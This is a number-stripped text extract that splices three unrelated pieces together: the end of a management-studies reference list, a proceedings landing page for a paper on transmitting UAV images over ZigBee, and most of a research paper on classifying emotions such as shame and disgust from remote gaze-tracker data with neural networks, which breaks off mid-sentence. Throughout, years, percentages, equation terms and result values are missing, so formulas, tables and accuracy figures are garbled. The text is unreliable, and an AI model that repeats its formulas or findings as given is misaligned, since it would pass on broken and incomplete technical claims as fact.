industry. research in the sociology of organizations : – . provan, k. g. and milward, h. b. . a preliminary theory of interorganizational network effectiveness: a comparative study of four community mental health systems. administrative science quarterly : – . rau, p. r. . investment bank market share, contingent fee payments, and the performance of acquiring firms. journal of financial economics : – . rotemberg, j. j. and saloner, g. . collusive price leadership. the journal of industrial economics : – . rowley, t., behrens, d. and krackhardt, d. . redundant governance structures: an analysis of structural and relational embeddedness in the steel and semiconductor industries. strategic management journal : – . ruef, m. and scott, w. r. . a multidimensional model of organizational legitimacy: hospital survival in changing institutional environments. administrative science quarterly : – . schoonhoven, c. b. . problems with contingency theory: testing assumptions hidden within the language of contingency theory. administrative science quarterly : – . shipilov, a. v. . should you bank on your network? relational and positional embeddedness in the making of financial capital. strategic organization : – . clients’ outcomes from providers’ networks shipilov, a. v., li, s. x. and baum, j. a. . a matching theory of embedded interfirm tie formation. academy of management proceedings. smith., a. / . an inquiry into the nature and causes of the wealth of nations everyman’s library, new york, ny, london and toronto. soda, g. . the management of firms’ alliance network positioning: implications for innovation. european management journal : – . szulanski, g. . exploring internal stickiness: impediments to the transfer of best practice within the firm. strategic management journal : – . tan, j., zhang, h. and wang, l. . network closure or structural hole? the conditioning effects of network-level social capital on innovation performance. entrepreneurship theory and practice : – . thompson, s. . simple formulas for standard errors that cluster by both firm and time. journal of financial economics : – . uzzi, b. . the sources and consequences of embeddedness for the economic performance of or- ganizations: the network effect. american sociological review : – . uzzi, b. . social structure and competition in interfirm networks: the paradox of embeddedness. administrative science quarterly : – . uzzi, b. and gillespie, j. j. . knowledge spillover in corporate financing networks: embeddedness and the firm’s debt performance. strategic management journal : – . uzzi, b. and lancaster, r. . relational embeddedness and learning: the case of bank loan managers and their clients. management science : – . veinot, t. c., bosk, e. a., unnikrishnan, k. p. and iwashyna, t. j. . revenue, relationships and routines: the social organization of acute myocardial infarction patient transfers in the united states. social science and medicine : – . wrzesniewski, a., mccauley, c., rozin, p. and schwartz, b. . jobs, careers, and callings: people’s relations to their work. journal of research in personality : – . wuyts, s., rindfleisch, a. and citrin, a. . outsourcing customer support: the role of provider customer focus. journal of operations management : – . zaheer, a. and venkatraman, n. . rel- ational governance as an interorganizational strategy: an empirical test of the role of trust in economic exchange. strategic management journal : – . research and implementation of the key technology of uav aerial image transmission | atlantis press proceedings journals books series:advances in computer science research proceedings of the second international conference of sensor network and computer engineering (icsnce ) home preface articles authors sessions organizers publishing information <previous article in volume next article in volume> research and implementation of the key technology of uav aerial image transmission authors fan yijun, lai yufeng corresponding author fan yijun available online april . doi https://doi.org/ . /icsnce- . . how to use a doi? keywords zigbee; uav; mapping; image; transmission abstract with the maturity of uav technology, especially the cost of the four rotor unmanned aerial vehicle is decreasing, the unmanned aerial vehicle (uav) will be a trend in the future. at the same time, because zigbee has the characteristics of low cost, low speed and short transmission distance, we use zigbee to achieve the transmission of image files between uav and ground receiving system computers. this paper introduces the system design and software program module hardware node design, the first use of zigbee wireless network as a data link, and then collected by the uav to the ground of the computer image transmission, in the process of transmission by subcontracting, merging, stop and wait agreement to ensure the correctness of data transmission right. through experimental test, the correct transmission of image files between uav and ground end computer can be realized when the image data is less than k bytes. open access this is an open access article distributed under the cc by-nc license. download article (pdf) <previous article in volume next article in volume> proceedings second international conference of sensor network and computer engineering (icsnce ) part of series advances in computer science research publication date april isbn - - - - issn - x doi https://doi.org/ . /icsnce- . . how to use a doi? open access this is an open access article distributed under the cc by-nc license. cite this article risenwbib ty - conf au - fan yijun au - lai yufeng py - / da - / ti - research and implementation of the key technology of uav aerial image transmission bt - second international conference of sensor network and computer engineering (icsnce ) pb - atlantis press sp - ep - sn - - x ur - https://doi.org/ . /icsnce- . . do - https://doi.org/ . /icsnce- . . id - yijun / er - download .riscopy to clipboard atlantis press atlantis press is a professional publisher of scientific, technical and medical (stm) proceedings, journals and books. we offer world-class services, fast turnaround times and personalised communication. the proceedings and journals on our platform are open access and generate millions of downloads every month. for more information, please contact us at: contact@atlantis-press.com proceedingsjournalsbookspublishing services aboutnewscontactsearch copyright © - atlantis press homeprivacy policyterms of use submitted february accepted june published august corresponding author rytis maskeliunas, rytis.maskeliunas@ktu.lt academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright maskeliunas and raudonis distributed under creative commons cc-by . open access are you ashamed? can a gaze tracker tell? rytis maskeliunas and vidas raudonis department of multimedia engineering, faculty of informatics, kaunas university of technology, kaunas, lithuania department of automation, faculty of electrical and electronics engineering, kaunas university of technology, kaunas, lithuania abstract our aim was to determine the possibility of detecting cognitive emotion information (neutral, disgust, shameful, ‘‘sensory pleasure’’) by using a remote eye tracker within an approximate range of meter. our implementation was based on a self-learning ann used for profile building, emotion status identification and recognition. participants of the experiment were provoked with audiovisual stimuli (videos with sounds) to measure the emotional feedback. the proposed system was able to classify each felt emotion with an average of % accuracy ( second measuring interval). subjects human-computer interaction, artificial intelligence, computer vision keywords cognitive, recognition, emotions, gaze-tracking introduction the user interfaces of the future cannot be imagined without an emotion-sensitive modality. more ways other than plain speech are used for communication. spatial, temporal, visual and vocal cues are often forgotten in computer interfaces. each cue relates to one or more forms of nonverbal communication that can be divided into chronemics, haptics, kinesics, oculesics, olfactics, paralanguage and proxemics (tubbs, ), relating to certain activities of a human body, voice or gazing. unfortunately, modern computer-based user interfaces do not take full advantage of nonverbal communicative abilities, often resulting in a much less than natural interaction. studying classic theories such as (hess, ; beatty & lucero- wagoner, ) opens up the idea of eye-tracking for investigating the behavior of the individuals and resulting into the perception of how eye analysis can be used to grasp human behavior from the relationship between pupil responses, various social attitudes and how it might be useful for various other purposes, not excluding diagnostics and therapeutics. referring to oculesics as a form of nonverbal communication, we can set a goal of detecting transmissions and reception of significant signals between communicators without the use of pronounced words. researchers working in the field strongly believe that a human—computer interaction might be significantly improved by incorporating social and emotional processes (kappas & krämer, ). it is clear that vital emotional information might affect human behavior in the context of information technology. however, this area is still somewhat new—progress is starting to become noticeable, ranging from enhancing the naturalness of interfaces to treatments (bal et al., ). naturally, the emotional part will closely correlate to the eye-based hcis. emotional information might how to cite this article maskeliunas and raudonis ( ), are you ashamed? can a gaze tracker tell? peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:rytis.maskeliunas@ktu.lt https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. be used to attract a user’s attention and then create a favorable atmosphere for subsequent interactions and to increase a user’s willingness to engage in an interaction (bee, andré & tober, ). a recording of visual fixation in nearly real-time can enable us to tell whether individuals express visual attention, are bored or disengaged (d’mello et al., ) or are they tired or fatigued (nguyen, isaacowitz & rubin, ). the manuscript presents an extension of our work on the development of gaze tracking- based emotion recognition system (viola & jones, ; raudonis et al., ). in other works we have taken a wearable eye tracking device as the main component of an emotion recognition system. along with a practical task of tele-marketing we are now investigating if it was possible to recognize emotions using a system based on the remote gaze tracking device. two additional emotional stimuli such as ‘‘sensory pleasure’’ and ‘‘shame’’ were introduced in the analysis framework. ‘‘disgust’’ and ‘‘neutral’’ emotions were also measured for comparison purposes. the paper presents background analysis, implementation, and concludes with an experimental evaluation. background analysis emotions can be categorized into basic emotion stages, which are amusement, anger, contempt, contentment, disgust, embarrassment, excitement, fear, guilt, pride in achievement, relief, sadness/distress, satisfaction, sensory pleasure, and shame. each of these fifteen stem out to similar and related sub-emotions (ekman, ). the combination of emotions results in a human feeling (plutchik, ). investigations have shown that eye contact in human-to-human communications play a significant role, where different types of eye motions can represent different emotions. even non-communicative persons display emotions (al-omar, ). anger is associated with glaring and wide open eyes, boredom involves not focusing or focusing to something else, sadness comes with looking down, etc. (roche & roche, ). this information can be transferred into gaze models based on emotional expressions (lance & marsella, ). gaze is influenced by contextual factors such as the emotional expression, as well as the participant’s goal (kuhn & tipples, ). cultural differences are affected by contextual information, though the benefit of contextual information depends upon the perceptual dissimilarity of the contextual emotions to the target emotion and the gaze pattern (stanley et al., ). novel technological improvements enable the development of affordable, video oculography-based, eye-tracking devices, which were previously available only to a laboratory researcher. these can be divided into two major groups depending on the kind of light used either infrared or visible (lu, lu & yang, ). the authors of christianson et al. ( ) have focused on change dynamics of the pupil (a pupillary response). the study showed that the size of the pupil can change voluntarily or involuntarily. the change in size can result from the appearance of real or perceived objects of focus, and even at the real or guessed indication of such appearances (calandra et al., ). this offers the feasibility of including pupil dilation as a measure to reflect affective states of individuals in the overall emotional intelligence screening system (al-omar, al-wabil & fawzi, ). the results of duque, sanchez & vazquez ( ) look at gaze-fixation and pupil dilation maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. support the idea that sustained processing of negative information is associated with a higher ruminative style and indicate differential associations between these factors at different levels of depressive symptomatology. the assessment of attentional orienting and engagement into emotional visual scenes showed that visual attention is captured by displaying both unpleasant and pleasant emotional content (nummenmaa, hyönä & calvo, ). urry ( ), in a randomized within-subjects design, used a cognitive reappraisal to increase and to decrease emotion levels in response to unpleasant pictures and registering gaze focus and direction. the experiments by budimir & palmovic ( ) suggested putting emotional content into the figure area and using different non complementary pictures to see if there is a difference between different emotional categories. lanatà, valenza & scilingo ( ) and calvo & lang ( ) reported a promising result aimed at investigation of the gaze pattern and variation of pupil size to discriminate emotional states, induced by looking at pictures with different arousal content. experimental evaluation showed good performance, with better score on arousal than valence (ringeval et al., ). in soleymani et al. ( ), a combination of eeg and gaze tracking over a display of database of emotional videos (soleymani, pantic & pun, ) resulted in the best classification result of . % for three labels of valence and . % for three labels of arousal. these results were obtained using a modality fusion strategy and a support vector machine, demonstrating that user-independent emotion recognition algorithm can outperform individual self-reports for arousal assessments and do not underperform for valence assessments. the authors of murphya & isaacowitza ( ) investigated a factor of age, suggesting that age-related gaze patterns in emotion recognition may depend on the specific emotion being recognized and may not be general across stimuli sets. implementation gaze tracking-based emotion detection method must evaluate an individual motion of the human eye and all changes in its properties carefully representing a certain pathway to a current emotion. eye motions can be grouped basically into two groups: voluntary and involuntary motions. the eye motion consists of changes in a gaze direction, a change of focus, tracking of an object of interest, etc. these kinds of mostly voluntary controlled motions do not necessarily relate to a current emotional state, but can represent a certain physical status (eg., tired/myopic). in our previous implementations, we have used a head-mounted eye tracking device which captured only a user’s eye. the tracker’s camera was fixed next to a user’s eye and as close as possible thus partly blocking a field of view. this was not a desirable feature, as it created a certain discomfort. we have also noticed that certain participants of our experiments likely did not reveal their true emotion since they found the gaze tracking device unpleasant. the remote eye tracking system does not have such shortcomings and enables capturing ‘‘real’’ (likely) emotions. the authors of the manuscript have decided to investigate two additional emotions which were not investigated in previous works (‘‘shame’’ and ‘‘sensory pleasure’’). the section below depicts our ann based emotion recognition model along with gaze recognition methods, calibration procedure and system workflow. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the ann model and hardware implementation of experimental investigation. emotion recognition model figure illustrates work flow of an ann-based classification algorithm. it consists of a measurement device that forms an input vector for four independent neural networks. each neural network is trained for each individual person to recognize a specific emotional status, i.e., neutral, disgust, shameful or ‘‘sensory pleasure.’’ the algorithm executes three main steps it: collects data samples, trains a classifier, and makes a decision based on the response of the classifier. the algorithm uses four different neural networks which independently classify given input signals. levenberg–marquardt backpropagation was applied as the learning method, activation function served as sigmoid, there were three layers (input layer, hidden layer and output layer). there are neurons onto the first input layer, three neurons on the second hidden layer and one neuron for output. three features were considered for the ann networks: the size of the eye pupil d, the position of the gaze point (coordinates x, y) and the motion speed of the gazing point v. the gaze point is the intersection point of gaze vector and the ‘‘surface’’ of the computer screen. each feature was sampled from to samples per second; therefore, the number of ann inputs varied. a sample is one measurement taken from one video frame (f). if there is a need for samples, video frames will be measured. one sample includes four parameters: a diameter of the eye pupil (d), a location coordinates of the eye pupil (x, y) and a motion speed on the eye pupil (v), which are taken as a difference between f(t− )−f(t). values of d, x, y and v are used as inputs for neural network. such combination of values corresponds to one measurement taken from one frame. if we use two measurements (two frames) then a number of inputs will be equal to but not (d , maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. x , y , v_ , d , x , y , d ). an optimal number of inputs was as it corresponded to one second measurement. pseudo code of an emotion classification algorithm is presented below. ann-based emotion classification algorithm . collecting sample data: x =([dt ...dt+m][xt ...xt+m][yt ...yt+m][vt ...vt+m− ]) . train ann classifiers based on input data yj = f (∑m i= xiωji ) , where j= , , , . make real-time emotion classification [maxvalue id]=max (y ,y ,y ,y ); if maxvalue > threshold emotion= id; end here t—is the time moment at which a sample was recorded, x—the input vector of the ann, y—output or membership probability, ω–weights of a neural network, d—the diameter of the recognized pupil, xt and yt are the coordinates of the pupil center and vt is the speed of motion of the eye pupils. the final decision is based on a maximal value of membership probability. the recognized emotional state is equal to a network id that had the highest probability value. we have used a threshold value of , . measurements of eye pupil’s center were used for probable capturing of attention focus to a certain extent, as this parameter strongly correlated to the given visual stimuli. ann finds probable relations to a certain emotion from a coordinate sequence (i.e., several measurements of the pupil’s center). gaze tracking methods the detection and tracking of the human eye was executed in the images acquired in the ir light. the eye illuminated with ir light can give two outcomes: the image of a dark or a bright eye pupil (pupil image and corneal reflection image). the image of a bright pupil is taken when the optical axis of a camera is parallel to the flow of ir light. the image of a dark pupil is taken when optical axis is not parallel to the flow of ir light. such images are captured in the near ir, which always shows a dark pupil area resulting from the absorption of ir in the inner eye tissues. the dark pupil effect is used in our eye pupil tracking system. such an effect simplifies eye pupil detection and the tracking task to a more reliable detection of the dark and rounded region in the image. an initial size of the eye pupil in the image is not known at the starting moment, because the eye pupil has relatively high size variation range. the size variation limits are well known (iskander et al., ) and this a priori information is incorporated in the eye pupil detection algorithm. presented algorithm uses a notation rmin and rmax for describing the lower and upper limits of the eye pupil (or radius). in this paper we have used a commercial remote eye tracking system hardware (eye tribe, copenhagen, denmark; https://theeyetribe.com/products/) which is based on one maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://theeyetribe.com/products/ http://dx.doi.org/ . /peerj-cs. camera sensor and two ir light sources. acquired images were processed using our own software. the process was based on three fundamental steps: detection of an accurate pupil position; detection of a corneal reflection; finding the relationship between a gaze point and a displacement of the eye pupil position. the accurate eye pupil and purkinje reflection is detected by evaluating statistical values of the grey scaled image, i.e., average values of greyness µ and standard deviation σ grey color in the region of interest. these statistical values are computed on the basis of formulas ( ) and ( ). the accurate detection of an intersection point between the surface of the screen and the gaze vector strongly relies on the calibration procedure and conditions. the calibration ensures a relation between the gaze point (x, y coordinates on a computer screen) and a pupil position in a captured frame. the grey scaled image g(u,v) is computations are based on formula ( ). the pixel value of the grey scaled image is acquired by computing an average color of the three color channels. g(u,v)= ∑ k= k(u,v) ( ) here k(u,v) is a color image of the three color channels k= , , . the notations u and v describe coordinates of the image pixel in the matrix. the average greyness value of region of interest (roi) can be computed via ( ). µ= ∑u u= ∑v v= g(u,v) u ·v . ( ) the standard deviation of the greyness of roi is computed using formula ( ). σ = √∑u u= ∑v v= (g(u,v)−µ) u ·v − . ( ) here u and v relate to a total number of rows and columns in the image. calculated statistical parameters are further used for position detection of the eye pupil and a corneal reflection. the dark pupil region is detected by estimating a mean greyness value and the standard deviation of each new eye image taken by a remote gaze tracker. each pixel of an eye image is labeled on the basis of estimated statistics of a functional condition given in formulas ( ) and ( ). the resulting image mp that maps the location of a dark region of the eye pupil is estimated regarding condition ( ). the black and white image mr that maps the location of reflection point is estimated using a condition ( ). mp(u,v)= { , if g(u,v)< µ− σ , otherwise ( ) mr(u,v)= { , if g(u,v)>µ+ σ , otherwise. ( ) maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure grayscaled image g(u,v), and resulting mapping of the mp and mr. examples of the resulting mapping (eye pupil and three reflection points) are shown in fig. . the eye pupil is detected in a mapping image mp. each resulting point cloud in mp is measured. the geometrical properties such as geometrical center and area of the cloud (region) are evaluated. the resulting regions in mp often form simple polygons made of flat shapes consisting of straight, non-intersecting line segments which are joined pairwise to form a closed path. therefore, formula ( ) can be applied to estimate the area of such region. a(j)= n− ∑ i= (xj(i)yj(i+ )−xj(i+ )yj(i)). ( ) here x(i) and y(i) are vertices of a simple polygon. the coordinates of the geometrical center c (described as c =(cx,cy)) of the polygons, can be defined as: cx(j)= a j− ∑ i= ( xj(i)+xj(i+ ) ) (xj(i)yj(i+ )−xj(i+ )yj(i)) ( ) cy(j)= a j− ∑ i= ( yj(i)+yj(i+ ) ) (xj(i)yj(i+ )−xj(i+ )yj(i)). ( ) maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the eye iris and measurements to calculate a gaze point. here a total number of polygons j is defined as < j < j− . in ( ), ( ) and ( ) vertices are numbered in a sequence, from the vertex x( ), y( ) to x(n), y(n). the jth region is labeled as the region that belongs to the eye pupil if it satisfies the condition ( ). xc,yc =cx ( j ) ,cy ( j ) if amin≤a≤amax. ( ) here amin=πr min is a minimal limit of the eye pupil size and amax=πr max is a maximum limit of the pupil size. notations xc and yc denote center coordinates of the detected eye pupil. when the pupil’s center is detected, the first closest reflection point is searched for in the mapping image mr. there are k points in mr, and the distance to each point can be expressed as: dr(k)= √ (xc−u) +(yc−v) , if mr(u,v)= . ( ) coordinates of the corneal reflection xr and yr are estimated by finding a minimal distance dr using an expression ( ). (xr,yr)=min k (dr(k)). ( ) the resulting gaze point is obtained by interpolating locations of the pupil’s center and the first corneal reflection. the fig. illustrates measurements aimed to interpolate the maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. actual intersection point between the gaze vector and the surface of the screen. displacement values are used for the calibration process. the displacements along horizontal axis and vertical axis can be calculated as: x =xc−xr, y =yc−yr. ( ) the linear approximation to a gaze point can be expressed as: x =a +a dx, y =a +a dy. ( ) here x and y are coordinates of a cursor on a computer screen. using the method of the least squares a coeficient is calculated by minimazing an error function e(a). ex(a)=x−(a +a dx), ey(a)=y −(a +a dy). ( ) the speed is defined as a simple sum of differences ( ). positive and negative values show the direction in which the gaze is moving. therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. v =(xt −xt− )+(yt −yt− ). ( ) the algorithm has an additional feature to capture out-of-bounds event, in which the extreme turn of the user’s head must be detected to signal the main recognition system to opt-out an event where a user has turned his head away from the computer screen (to capture a ‘‘look over the shoulder’’ effect). such head motions were often noticeable when participants were stimulated by ‘‘shame’’ and ‘‘disgust’’ emotional stimuli. we have implemented this using standard haar cascades to detect a face (viola & jones, ). when two eyes were visible, a system counted that a user was in the range of tracking fields, otherwise an out of bound event was generated. calibration the calibration method is a set of processes that establish a relationship between the center gaze point and an actual position of the computer screen. for the experiment, a ’’ p monitor has been used. the participants had to watch a calibration grid which consisted of points. each calibration point was shown once at a time in a serial manner (fig. a). the calibration process was executed each time, when a user accessed a gaze tracking system. such recalibration procedure ensured reasonably good quality of the measurements. the resulting distribution of the gaze points is illustrated in fig. b. the mean absolute gaze estimation error on the vertical axis was about pixels and about pixels on the horizontal axis. in the event of the extreme head pose change and recover, the mean absolute gaze estimation error on the vertical axis was about pixels and about pixels on the horizontal axis. an approximate optimum quality eye-to-camera distance was established to be at around meter. this was measured by authors themselves (as expert users) testing the device with an increasing range from cm to m with a step of cm. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a screen with a calibration grid (a) and the calibration result shown by the distribution of pixels around a calibration point (b). system workflow system workflow is illustrated in the flow chart shown in fig. . each participant was asked to calibrate the eye tracking system, based on a certain procedure. the chair was ‘‘fixed,’’ so the torso was not moving and the head position (gaze-point) on a turn back event remained stable. the orientation of the head was evaluated on the basis of the detected eye positions. the orientation angle was estimated between a horizontal line and a line drawn between the detected eye centers. such an angle informs about how much a head is rotated around y axis (inclined). all other rotation angles were controlled by not allowing additional movement (per instruction). experimental investigation experimental setup experiments were carried out during a day time, therefore a test room was illuminated mostly by a sun light only (amount and position changing over time) and, depending on the time of day, blinds were used on windows. illumination levels were also impacted by door opening/closing (corridor is always brightly lit) during the early morning (∼ : )/noon (∼ : ). the eye itself was illuminated using an infrared light source of eye tracker’s hardware. a difference vector between a pupil center and a glint point remained stable in most conditions. all data sets of a perceived session were reviewed manually. data where our algorithm was unable to correct itself (missed an out of bounds event) was removed aiming not to impact results. a total of volunteers ( males, females, – years old) were asked to participate in testing the system of emotion recognition. we have chosen a similar set of participants maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure system workflow diagram. as in our previous experiments (raudonis et al., ; raudonis, ). unfortunately, a majority of people involved were not the same as two years have passed and we have had no opportunity to replicate that factor. to induce more reliable responses in participants, all experiments were conducted in an open-door environment (somebody often comes in) instead of a closed door laboratory type room as in our previous studies. an accidental visitor could observe a participant and experimental environment thus increasing the effect of stimuli, especially when content provoking shame and disgust emotions was demonstrated. video materials ( * ) consisting of neutral, disgusting, shameful and ‘‘sensory pleasure’’ content (sample screenshots in fig. ) were played back in a close view on ’’ p monitor in full screen and with sound. all videos were gathered from the public domain with a help of psychologist. the database consists of five different clips (length min each, h total) for every emotion (total length of h). two out of those clips were used for training ( min per emotion), other three ( min per emotion) for maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure visual stimulus samples which were used for experimental investigation and should invoke four different emotional states: (a) neutral, (b) disgust, (c) shame and (d) sensory pleasure. evaluation. a randomly selected -minute fragment was displayed during training and evaluation stages, five times (two times during training, three times during evaluation) for each person per emotion (in total each person viewed min of content (combined) per emotion). videos used for training were not played during the evaluation. each participant was given a -minute break between playback of different emotions. we have asked each participant to subjectively verify a perceived emotion and we have only used only ‘‘confirmed’’ signals. during a stimulation process the size of the pupil, the coordinates of the pupil center and a gaze point movement speed were registered. research on human subjects was approved by an institutional review board of kaunas university of technology (document # - - ). experimental results figure a illustrates a sample fragment of measurements of the size of people pupil. the size of each participant’s eye pupil was different during the perception process of each emotion, for example, the size of the first person’s pupil was ∼ % larger when being in a neutral state vs being involved in a content ( . pixels vs . pixels). deviation data have shown that it is important to note that the size can change significantly over time while likely still experiencing a similar emotion. this example proves that we cannot universally and subject-independently determine the real emotion a human was experiencing referring only to his eye pupil’s size. all remaining classification features have to be included. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average pupil size of first six participants who were stimulated with four different emotional stimuli (a) and average pupil size between participants of the experiment (b). figure b illustrates an average pupil size for all of the participants (average of people) who were stimulated with certain emotional stimuli. red and blue lines mark variation limits of the pupil size. a pupil size shows that the highest emotional extremes were obtained when a person was stimulated by ‘‘sensory pleasure’’ and ‘‘shame’’ emotional stimuli. figure illustrates attention concentration maps, representing attention map of the person stimulated with each specific emotion separately. the radius of each grey circle correlates with time spent to observe a specific part of the visual data and certain coordinates of the attention point. this is illustrated by the attention concentration map for one person on the left and the average attention map for all participants on the right. a blue line in the attention map represents a trajectory of the gaze point. attention maps highlight different regions of two dimensional visual stimuli. such distribution of attention points strongly depends on the felt emotion at a given moment. attention maps are drawn with regard to presented visual data, arrangement of details in visual stimuli and cognitive capabilities of the individual person. certain ‘‘parts’’ of the disgust emotional stimuli were ignored by all participants. a point of interest moves quite differently in a d space during each of the emotional stimuli. the next obvious conclusion was that this data might be usable to determine a current emotion. a movement parameter also depended on the context of emotional information shown on screen, as well as a position and motion of the object on screen (especially during videos where a view was concentrated on the specific subject). for example, all participants tried not to concentrate on the disgusting ‘‘bits’’ in videos, so an average trajectory covered a reasonably small path in d space. a large overlap of d space was noted when ‘‘sensory pleasure’’ videos for most of participants were played, maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure attention map of id participant (a, c, e, g) and average attention mapgaze trajectory (b, d, f, h) of all participants stimulated by the neutral (a and b), disgust (c and d), shameful (e and f) and ‘‘sensory pleasure’’ (g and h) emotional stimuli. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average jump distance between gaze fixation points. emotion stimuli average jump distance (mean ± std), [pixels] ‘‘neutral’’ . ± . ‘‘disgust’’ . ± . ‘‘shame’’ . ± . ‘‘sensory pleasure’’ ± . as most viewed this content in a quite relaxed manner and did not concentrate much. when other types of materials were demonstrated, a movement was somewhat more concentrated. playback of ‘‘shameful’’ (erotic movies) and to some extend ‘‘disgusting’’ content introduced a quick look ‘‘over the shoulder’’ effect (checking if someone was there to identify who is the public ‘‘sinner’’—an effect which might very well be region and culture dependent). smaller attention maps and longer trajectories were generated due to this effect (figs. e– f). to evaluate a magnitude of changes in the trajectory of a gaze point, histograms and outcomes of a probability distance function (pdf) of distances between gaze fixation points and the speed of changing fixation points were given (fig. ). data were calculated from the gaze trajectories acquired when participants were stimulated using (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. pixel values were as calculated and were not rounded. pdfs were calculated using a standard matlab implementation ( ). y = f (x|µ,σ)= σ √ π e −(x−µ) σ . ( ) the first parameter µ is the mean. the second σ is the standard deviation. the average distance between gaze fixations points is given in table . the smallest distance between gaze fixation points was estimated from a gaze trajectory when a person was stimulated with a disgust emotional stimulus. the highest jump in distance was generated when person was stimulated with a shameful emotional stimulus (part of a psychological effect of a person not wanting to be identified). to evaluate the changes of speed in the trajectory of a gaze point, histograms and probability density functions of the gaze point change scale (speed of gazing) are shown in fig. , representing a distribution of an average speed. the speed was evaluated with a pixel per frame value which showed how fast the gaze moved from frame to frame. data were calculated from gaze trajectories when participants were stimulated using (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. values of average changes of speed in the gaze trajectory are given in table . positive and negative values show a direction in which the gaze is moving. therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. an average speed given varies around . this means that the gaze direction is rapidly changing around (mu = ); therefore, the std value is more important here because it represents the distribution of speed. the speed is computed as location difference between frames f(t− )−f(t). the speed is defined as a simple sum of differences (see ( )). positive and negative values show maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average histogram and probability density function (top left corner) of distances between gaze fixation points when a person was stimulated with (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. table average changes of speed in the gaze trajectory. emotion stimuli average changes in speed (mean ± std), [pixels/frame] ‘‘neutral’’ . ± . ‘‘disgust’’ . ± . ‘‘shameful’’ . ± . ‘‘sensory pleasure’’ − . ± . a direction in which the gaze is moving. therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. the results showed that the smallest speed value was estimated from the gaze trajectory when a person was stimulated with disgusting emotional stimuli. the highest speed values were generated when a person was stimulated with shameful emotional stimuli. an average distribution in results of people clearly illustrates that movement speeds were quite consistent and varied only during a playback of ‘‘shameful’’ content. the acceleration increased when our test subject experienced ‘‘strong’’ emotions or he was very interested in the information shown during the time-frame on a screen. close to zero ( ) value indicates that a person is focused for the moment (gaze does not move or the movement is minor). negative and positive values are ‘‘fluctuations’’ to another point of interest on screen. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average histogram and probability density function (top left corner) of changes in speed of a gaze point when a person was stimulated with (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. table average confusion matrix. emotion ‘‘neutral’’ ‘‘disgust’’ ‘‘shameful’’ ‘‘sensory pleasure’’ ‘‘neutral’’ . . . . ‘‘disgust’’ . . . . ‘‘shameful’’ . . . . ‘‘sensory pleasure’’ . . . . table illustrates an averaged confusion matrix (acm) for all participants. the average classification accuracy is . and false positive is . . measured misclassification value was similar to every emotion. figure illustrates the relationship between classification accuracy and a number of feature samples. a number of feature samples is represented on a horizontal axis and the achieved accuracy value is represented on a vertical axis. a curve of different colors represents different results of different emotional states. a total of s of gaze ‘‘recordings’’ (approximately samples on average) are necessary to achieve a ± . % recognition accuracy of a specific emotional state. functional curves represent an average classification accuracy for all participants (combined). the largest changes in human’s visual mechanism maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure relationship curves between classification accuracy and recorded samples used per classifi- cation feature (person dependent mode). figure relationship curves between classification accuracy and recorded samples used per classifi- cation feature (person independent mode). maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that relay to an emotion are generated at the very beginning of emotional stimulation. the more samples we use (frames * (d, x, y, v)), the more information we give to a nn which might not necessary accurately represent certain emotion. figure shows person independent recognition performance, achieved by training ann with emotional profiles of people, and using the measured profiles of the remaining persons for overall person-independent recognition accuracy evaluation. in a person independent mode, the best overall accuracy of . ± . % was achieved using samples and in comparison at samples we have measured only . ± . % overall recognition accuracy. discussion and conclusion the experiments have shown that each participant reacts differently to emotionally stimulating videos and the reaction or the emotional response strongly correlates with a cognitive perception, motivation and individual live experience of that person. attention concentration maps proved to be very different for each visual stimulus. a certain person’s emotional state was recognized with a ∼ % of accuracy within an acceptable range of around meter (eye-to-camera). approximately s (∼ samples per feature) of measurements were needed to recognize a specific emotional state with a ± . % recognition error. the recognition error increased rapidly when fewer samples were used. ‘‘disgust’’ emotional state was recognized with a highest recognition rate of . ± . %. in this case, a clear distinction was noticed in a 